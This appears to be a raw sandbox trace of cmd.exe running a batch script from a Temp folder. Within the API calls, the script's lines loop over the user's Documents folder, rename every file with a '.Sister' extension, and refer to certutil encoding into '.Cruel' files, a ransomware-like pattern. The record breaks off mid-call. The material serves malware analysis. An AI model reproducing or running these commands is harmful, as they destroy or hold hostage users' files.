lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe718, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe718*=0x2) returned 1 [0303.696] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0303.696] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures") returned 0x18 [0303.696] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe758 | out: _Buffer="C:\\Users\\FD1HVy\\Pictures") returned 24 [0303.696] _vsnwprintf (in: _Buffer=0x21ed8e80190, _BufferCount=0x83cd, _Format="%c", _ArgList=0xa6cf4fe758 | out: _Buffer=">") returned 1 [0303.696] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.696] GetFileType (hFile=0x50) returned 0x2 [0303.696] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0303.697] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe708 | out: lpMode=0xa6cf4fe708) returned 1 [0303.697] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.697] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0xa6cf4fe748, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe748*=0x19) returned 1 [0303.698] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.698] GetFileType (hFile=0x50) returned 0x2 [0303.698] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0303.698] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe9d8 | out: lpMode=0xa6cf4fe9d8) returned 1 [0303.698] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.698] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8c95910*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fea18, lpReserved=0x0 | out: lpBuffer=0x21ed8c95910*, lpNumberOfCharsWritten=0xa6cf4fea18*=0x2) returned 1 [0303.698] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fea18 | out: _Buffer=" C:\\Users\\FD1HVy\\Documents\\ ") returned 28 [0303.698] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.698] GetFileType (hFile=0x50) returned 0x2 [0303.699] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0303.699] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe9a8 | out: lpMode=0xa6cf4fe9a8) returned 1 [0303.699] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.699] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x1c, lpNumberOfCharsWritten=0xa6cf4fe9e8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe9e8*=0x1c) returned 1 [0303.699] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fea48 | out: _Buffer="\r\n") returned 2 [0303.699] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.699] GetFileType (hFile=0x50) returned 0x2 [0303.699] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0303.699] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe9d8 | out: lpMode=0xa6cf4fe9d8) returned 1 [0303.700] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.700] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fea18, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fea18*=0x2) returned 1 [0303.706] malloc (_Size=0xffce) returned 0x21ed8e90940 [0303.706] ??_V@YAXPEAX@Z () returned 0x21ed8e90940 [0303.706] _wcsicmp (_String1="cd", _String2="DIR") returned -1 [0303.706] _wcsicmp (_String1="cd", _String2="ERASE") returned -2 [0303.706] _wcsicmp (_String1="cd", _String2="DEL") returned -1 [0303.706] _wcsicmp (_String1="cd", _String2="TYPE") returned -17 [0303.706] _wcsicmp (_String1="cd", _String2="COPY") returned -11 [0303.706] _wcsicmp (_String1="cd", _String2="CD") returned 0 [0303.706] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe760, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0303.707] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0303.707] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0303.707] malloc (_Size=0xffce) returned 0x21eda100000 [0303.707] ??_V@YAXPEAX@Z () returned 0x21eda100000 [0303.707] _wcsicmp (_String1="cd", _String2="DIR") returned -1 [0303.707] _wcsicmp (_String1="cd", _String2="ERASE") returned -2 [0303.707] _wcsicmp (_String1="cd", _String2="DEL") returned -1 [0303.707] _wcsicmp (_String1="cd", _String2="TYPE") returned -17 [0303.707] _wcsicmp (_String1="cd", _String2="COPY") returned -11 [0303.707] _wcsicmp (_String1="cd", _String2="CD") returned 0 [0303.707] ??_V@YAXPEAX@Z () returned 0x1 [0303.707] GetProcessHeap () returned 0x21ed8c70000 [0303.707] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x80) returned 0x21ed9379780 [0303.708] GetProcessHeap () returned 0x21ed8c70000 [0303.708] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9379780, Size=0x48) returned 0x21ed8c7c110 [0303.708] GetProcessHeap () returned 0x21ed8c70000 [0303.708] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c7c110) returned 0x48 [0303.708] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0303.708] malloc (_Size=0xffce) returned 0x21eda100000 [0303.708] ??_V@YAXPEAX@Z () returned 0x21eda100000 [0303.708] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0303.708] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x21eda100000, nVolumeNameSize=0x7fe7, lpVolumeSerialNumber=0xa6cf4fe2b0, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xa6cf4fe2b0*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0303.711] ??_V@YAXPEAX@Z () returned 0x1 [0303.711] GetProcessHeap () returned 0x21ed8c70000 [0303.711] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4e) returned 0x21ed8c7ca00 [0303.711] malloc (_Size=0xffce) returned 0x21eda100000 [0303.711] ??_V@YAXPEAX@Z () returned 0x21eda100000 [0303.711] GetProcessHeap () returned 0x21ed8c70000 [0303.711] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x80) returned 0x21ed9379930 [0303.711] GetProcessHeap () returned 0x21ed8c70000 [0303.711] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9379930, Size=0x48) returned 0x21ed8c7c160 [0303.711] GetProcessHeap () returned 0x21ed8c70000 [0303.711] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c7c160) returned 0x48 [0303.711] _wcsnicmp (_String1="C:", _String2="/D", _MaxCount=0x2) returned 52 [0303.711] malloc (_Size=0xffce) returned 0x21eda10ffe0 [0303.711] ??_V@YAXPEAX@Z () returned 0x21eda10ffe0 [0303.711] GetProcessHeap () returned 0x21ed8c70000 [0303.712] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x46) returned 0x21ed8c7c020 [0303.712] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21eda10ffe0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures") returned 0x18 [0303.712] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents" (normalized: "c:\\users\\fd1hvy\\documents")) returned 0x11 [0303.712] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdd10 | out: lpFindFileData=0xa6cf4fdd10*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x21ed8c7cca0 [0303.712] FindClose (in: hFindFile=0x21ed8c7cca0 | out: hFindFile=0x21ed8c7cca0) returned 1 [0303.712] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdd10 | out: lpFindFileData=0xa6cf4fdd10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8c7d000 [0303.712] FindClose (in: hFindFile=0x21ed8c7d000 | out: hFindFile=0x21ed8c7d000) returned 1 [0303.713] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents", lpFindFileData=0xa6cf4fdd10 | out: lpFindFileData=0xa6cf4fdd10*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe6a39604, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xe6a39604, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 0x21ed8c7cb80 [0303.713] FindClose (in: hFindFile=0x21ed8c7cb80 | out: hFindFile=0x21ed8c7cb80) returned 1 [0303.713] _wcsnicmp (_String1="DOCUME~1", _String2="Documents", _MaxCount=0x9) returned 16 [0303.713] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents" (normalized: "c:\\users\\fd1hvy\\documents")) returned 0x11 [0303.713] SetCurrentDirectoryW (lpPathName="C:\\Users\\FD1HVy\\Documents" (normalized: "c:\\users\\fd1hvy\\documents")) returned 1 [0303.713] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\FD1HVy\\Documents") returned 1 [0303.713] GetProcessHeap () returned 0x21ed8c70000 [0303.713] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc7010) returned 1 [0303.715] GetEnvironmentStringsW () returned 0x21ed9980080* [0303.715] GetProcessHeap () returned 0x21ed8c70000 [0303.715] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb44) returned 0x21ed8d603e0 [0303.715] FreeEnvironmentStringsA (penv="=") returned 1 [0303.715] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0303.715] GetProcessHeap () returned 0x21ed8c70000 [0303.715] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7c020) returned 1 [0303.715] ??_V@YAXPEAX@Z () returned 0x1 [0303.715] ??_V@YAXPEAX@Z () returned 0x1 [0303.715] ??_V@YAXPEAX@Z () returned 0x1 [0303.715] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.715] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x7) returned 1 [0303.716] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.716] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0x7ff66c5cfc08 | out: lpMode=0x7ff66c5cfc08) returned 1 [0303.717] _get_osfhandle (_FileHandle=0) returned 0x4c [0303.717] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x7ff66c5cfc0c | out: lpMode=0x7ff66c5cfc0c) returned 1 [0303.717] SetConsoleInputExeNameW () returned 0x1 [0303.717] GetConsoleOutputCP () returned 0x1b5 [0303.717] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff66c5cfbb0 | out: lpCPInfo=0x7ff66c5cfbb0) returned 1 [0303.718] SetThreadUILanguage (LangId=0x0) returned 0x409 [0303.718] ??_V@YAXPEAX@Z () returned 0x1 [0303.718] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\AC92.tmp\\ACA2.tmp\\ACA3.bat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\ac92.tmp\\aca2.tmp\\aca3.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xa6cf4fe9b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3c [0303.718] _open_osfhandle (_OSFileHandle=0x3c, _Flags=8) returned 3 [0303.718] _get_osfhandle (_FileHandle=3) returned 0x3c [0303.718] SetFilePointer (in: hFile=0x3c, lDistanceToMove=798, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x31e [0303.718] GetProcessHeap () returned 0x21ed8c70000 [0303.719] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7c160) returned 1 [0303.719] GetProcessHeap () returned 0x21ed8c70000 [0303.719] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7ca00) returned 1 [0303.719] GetProcessHeap () returned 0x21ed8c70000 [0303.719] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7c110) returned 1 [0303.719] GetProcessHeap () returned 0x21ed8c70000 [0303.719] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7be90) returned 1 [0303.719] GetProcessHeap () returned 0x21ed8c70000 [0303.719] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c95900) returned 1 [0303.719] GetProcessHeap () returned 0x21ed8c70000 [0303.719] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c967c0) returned 1 [0303.719] _get_osfhandle (_FileHandle=3) returned 0x3c [0303.719] SetFilePointer (in: hFile=0x3c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x31e [0303.732] ReadFile (in: hFile=0x3c, lpBuffer=0x7ff66c5c9970, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xa6cf4fe970, lpOverlapped=0x0 | out: lpBuffer=0x7ff66c5c9970*, lpNumberOfBytesRead=0xa6cf4fe970*=0x1df, lpOverlapped=0x0) returned 1 [0303.734] SetFilePointer (in: hFile=0x3c, lDistanceToMove=800, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x320 [0303.734] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff66c5c9970, cbMultiByte=2, lpWideCharStr=0x7ff66c5d3c30, cchWideChar=8191 | out: lpWideCharStr="\r\n %UserProFile%\\Documents\\\r\nutil -encode \"%%~a\" \"%%~na.Cruel\"\r\n \"%%~a.Sister\" \"%%~na.bat\"\r\n") returned 2 [0303.734] _get_osfhandle (_FileHandle=3) returned 0x3c [0303.734] GetFileType (hFile=0x3c) returned 0x1 [0303.734] _get_osfhandle (_FileHandle=3) returned 0x3c [0303.734] SetFilePointer (in: hFile=0x3c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x320 [0303.734] GetProcessHeap () returned 0x21ed8c70000 [0303.734] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d32630 [0303.735] GetProcessHeap () returned 0x21ed8c70000 [0303.735] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d32630) returned 1 [0303.735] _tell (_FileHandle=3) returned 800 [0303.735] _close (_FileHandle=3) returned 0 [0303.737] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\AC92.tmp\\ACA2.tmp\\ACA3.bat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\ac92.tmp\\aca2.tmp\\aca3.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xa6cf4fe9b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3c [0303.738] _open_osfhandle (_OSFileHandle=0x3c, _Flags=8) returned 3 [0303.738] _get_osfhandle (_FileHandle=3) returned 0x3c [0303.738] SetFilePointer (in: hFile=0x3c, lDistanceToMove=800, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x320 [0303.738] _get_osfhandle (_FileHandle=3) returned 0x3c [0303.738] SetFilePointer (in: hFile=0x3c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x320 [0303.738] ReadFile (in: hFile=0x3c, lpBuffer=0x7ff66c5c9970, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xa6cf4fe970, lpOverlapped=0x0 | out: lpBuffer=0x7ff66c5c9970*, lpNumberOfBytesRead=0xa6cf4fe970*=0x1dd, lpOverlapped=0x0) returned 1 [0303.739] SetFilePointer (in: hFile=0x3c, lDistanceToMove=892, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x37c [0303.739] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff66c5c9970, cbMultiByte=92, lpWideCharStr=0x7ff66c5d3c30, cchWideChar=8191 | out: lpWideCharStr="for %%a in (*) do ren \"%%a\" \"%%~a.Sister\"&for %%a in (%0) do ren \"%%~a.Sister\" \"%%~na.bat\"\r\n") returned 92 [0303.739] _get_osfhandle (_FileHandle=3) returned 0x3c [0303.739] GetFileType (hFile=0x3c) returned 0x1 [0303.739] _get_osfhandle (_FileHandle=3) returned 0x3c [0303.739] SetFilePointer (in: hFile=0x3c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x37c [0303.739] GetProcessHeap () returned 0x21ed8c70000 [0303.739] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d32630 [0303.739] GetProcessHeap () returned 0x21ed8c70000 [0303.739] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d32630) returned 1 [0303.739] _wcsicmp (_String1="for", _String2=")") returned 61 [0303.740] _wcsicmp (_String1="FOR", _String2="for") returned 0 [0303.740] _wcsicmp (_String1="FOR/?", _String2="for") returned 47 [0303.740] GetProcessHeap () returned 0x21ed8c70000 [0303.740] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb0) returned 0x21ed8c96580 [0303.740] GetProcessHeap () returned 0x21ed8c70000 [0303.740] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4c) returned 0x21ed8c7cd00 [0303.740] GetProcessHeap () returned 0x21ed8c70000 [0303.740] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1c) returned 0x21ed8d45e00 [0303.740] GetProcessHeap () returned 0x21ed8c70000 [0303.740] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d45e00, Size=0x18) returned 0x21ed8c95600 [0303.740] GetProcessHeap () returned 0x21ed8c70000 [0303.740] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c95600) returned 0x18 [0303.740] _wcsicmp (_String1="/L", _String2="%a") returned 10 [0303.740] _wcsicmp (_String1="/D", _String2="%a") returned 10 [0303.740] _wcsicmp (_String1="/F", _String2="%a") returned 10 [0303.740] _wcsicmp (_String1="/R", _String2="%a") returned 10 [0303.740] _wcsicmp (_String1="IN", _String2="in") returned 0 [0303.740] GetProcessHeap () returned 0x21ed8c70000 [0303.741] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x14) returned 0x21ed8c95b20 [0303.741] _wcsicmp (_String1="DO", _String2="do") returned 0 [0303.741] _wcsicmp (_String1="ren", _String2=")") returned 73 [0303.741] _wcsicmp (_String1="FOR", _String2="ren") returned -12 [0303.741] _wcsicmp (_String1="FOR/?", _String2="ren") returned -12 [0303.741] _wcsicmp (_String1="IF", _String2="ren") returned -9 [0303.741] _wcsicmp (_String1="IF/?", _String2="ren") returned -9 [0303.741] _wcsicmp (_String1="REM", _String2="ren") returned -1 [0303.741] _wcsicmp (_String1="REM/?", _String2="ren") returned -1 [0303.741] GetProcessHeap () returned 0x21ed8c70000 [0303.741] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb0) returned 0x21ed8c96b80 [0303.741] GetProcessHeap () returned 0x21ed8c70000 [0303.741] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x18) returned 0x21ed8c95800 [0303.741] GetProcessHeap () returned 0x21ed8c70000 [0303.741] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x36) returned 0x21ed8cc8750 [0303.741] GetProcessHeap () returned 0x21ed8c70000 [0303.741] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb0) returned 0x21ed8c96c40 [0303.741] _wcsicmp (_String1="for", _String2=")") returned 61 [0303.741] _wcsicmp (_String1="FOR", _String2="for") returned 0 [0303.742] _wcsicmp (_String1="FOR/?", _String2="for") returned 47 [0303.742] GetProcessHeap () returned 0x21ed8c70000 [0303.742] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb0) returned 0x21ed8c96100 [0303.742] GetProcessHeap () returned 0x21ed8c70000 [0303.742] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4c) returned 0x21ed8c7cd60 [0303.742] GetProcessHeap () returned 0x21ed8c70000 [0303.742] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1c) returned 0x21ed8d45b30 [0303.742] GetProcessHeap () returned 0x21ed8c70000 [0303.742] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d45b30, Size=0x18) returned 0x21ed8c957c0 [0303.742] GetProcessHeap () returned 0x21ed8c70000 [0303.742] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c957c0) returned 0x18 [0303.742] _wcsicmp (_String1="/L", _String2="%a") returned 10 [0303.742] _wcsicmp (_String1="/D", _String2="%a") returned 10 [0303.742] _wcsicmp (_String1="/F", _String2="%a") returned 10 [0303.742] _wcsicmp (_String1="/R", _String2="%a") returned 10 [0303.742] _wcsicmp (_String1="IN", _String2="in") returned 0 [0303.742] GetProcessHeap () returned 0x21ed8c70000 [0303.743] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb0) returned 0x21ed8c96ac0 [0303.743] _wcsicmp (_String1="DO", _String2="do") returned 0 [0303.743] _wcsicmp (_String1="ren", _String2=")") returned 73 [0303.743] _wcsicmp (_String1="FOR", _String2="ren") returned -12 [0303.743] _wcsicmp (_String1="FOR/?", _String2="ren") returned -12 [0303.743] _wcsicmp (_String1="IF", _String2="ren") returned -9 [0303.743] _wcsicmp (_String1="IF/?", _String2="ren") returned -9 [0303.743] _wcsicmp (_String1="REM", _String2="ren") returned -1 [0303.743] _wcsicmp (_String1="REM/?", _String2="ren") returned -1 [0303.743] GetProcessHeap () returned 0x21ed8c70000 [0303.743] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb0) returned 0x21ed8c96640 [0303.743] GetProcessHeap () returned 0x21ed8c70000 [0303.743] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x18) returned 0x21ed8c95620 [0303.743] GetProcessHeap () returned 0x21ed8c70000 [0303.743] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x42) returned 0x21ed8c7bc10 [0303.743] _tell (_FileHandle=3) returned 892 [0303.744] _close (_FileHandle=3) returned 0 [0303.744] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe748 | out: _Buffer="\r\n") returned 2 [0303.744] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.744] GetFileType (hFile=0x50) returned 0x2 [0303.744] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0303.744] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe6d8 | out: lpMode=0xa6cf4fe6d8) returned 1 [0303.750] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.750] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe718, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe718*=0x2) returned 1 [0303.760] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0303.760] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0303.761] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe758 | out: _Buffer="C:\\Users\\FD1HVy\\Documents") returned 25 [0303.761] _vsnwprintf (in: _Buffer=0x21ed8e80192, _BufferCount=0x83cc, _Format="%c", _ArgList=0xa6cf4fe758 | out: _Buffer=">") returned 1 [0303.761] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.761] GetFileType (hFile=0x50) returned 0x2 [0303.761] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0303.761] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe708 | out: lpMode=0xa6cf4fe708) returned 1 [0303.761] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.761] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0xa6cf4fe748, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe748*=0x1a) returned 1 [0303.762] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xa6cf4fea18 | out: _Buffer="for") returned 3 [0303.762] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.762] GetFileType (hFile=0x50) returned 0x2 [0303.762] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0303.762] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe9a8 | out: lpMode=0xa6cf4fe9a8) returned 1 [0303.763] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.763] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe9e8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe9e8*=0x3) returned 1 [0303.763] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fea18 | out: _Buffer=" %a in ") returned 7 [0303.763] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.763] GetFileType (hFile=0x50) returned 0x2 [0303.763] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0303.763] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe9a8 | out: lpMode=0xa6cf4fe9a8) returned 1 [0303.764] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.764] WriteConsoleW (in: hConsoleOutput=0x50, 